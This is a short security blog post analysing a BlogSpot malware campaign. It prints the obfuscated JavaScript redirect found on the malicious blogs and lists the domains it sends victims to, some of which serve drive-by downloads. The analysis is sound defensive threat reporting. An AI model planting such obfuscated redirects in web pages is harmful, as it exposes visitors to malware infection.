marco
blog
Menu:
Mutu campaign on BlogSpot
October 10, 2009
A new malware campaign is currently abusing BlogSpot. I'll call it the "Mutu" campaign from the text that is found on the malicious pages. I have so far detected almost 400 blogs that are actively involved in the campaign.
A malicious blog looks like the following picture. Note that the actual text, layout, and color themes may vary across different pages.
A malicious page contains a script tag similar to the following:
<script language="javascript">
location.href='\u0068\u0074\u0074\u0070\u003a\u002f\u002f'
+ unescape('%77%77%77%2e%78')+unescape('%78%78%6f%64')
+'\u006e\u006f\u006b\u006c\u0061\u0073'+'sniki'
+unescape('%2e%63%6f%6d%2f')+unescape('%3f%61%64')
+unescape('%76%3d%67%61%72')+'bunov'+''
</script>
The script causes the victim's browser to fetch a malicious (or at least dubious) page from one of several domains. These are the domains that are currently being redirected to:
- afsharteam1.com
- mihavom.cn
- news.allwinsoft.ru
- relstagu.ru
- www.pillsonlinerxhealth.net
- www.xxxodnoklassniki.com
Some of these domains appear to be selling various items (cell phone,
drugs). However, others (at least afsharteam1.com) launch
drive-by-download attacks. As a result, a malware with limited and
generic detection on
VirusTotal gets downloaded and launched on the
vicitm's machine.
For more details, see the Wepawet report for
bertilladingman36429.blogspot.com,
a blog that redirects to drive-by attacks.
To leave a comment, complete the form below. Mandatory fields are marked *.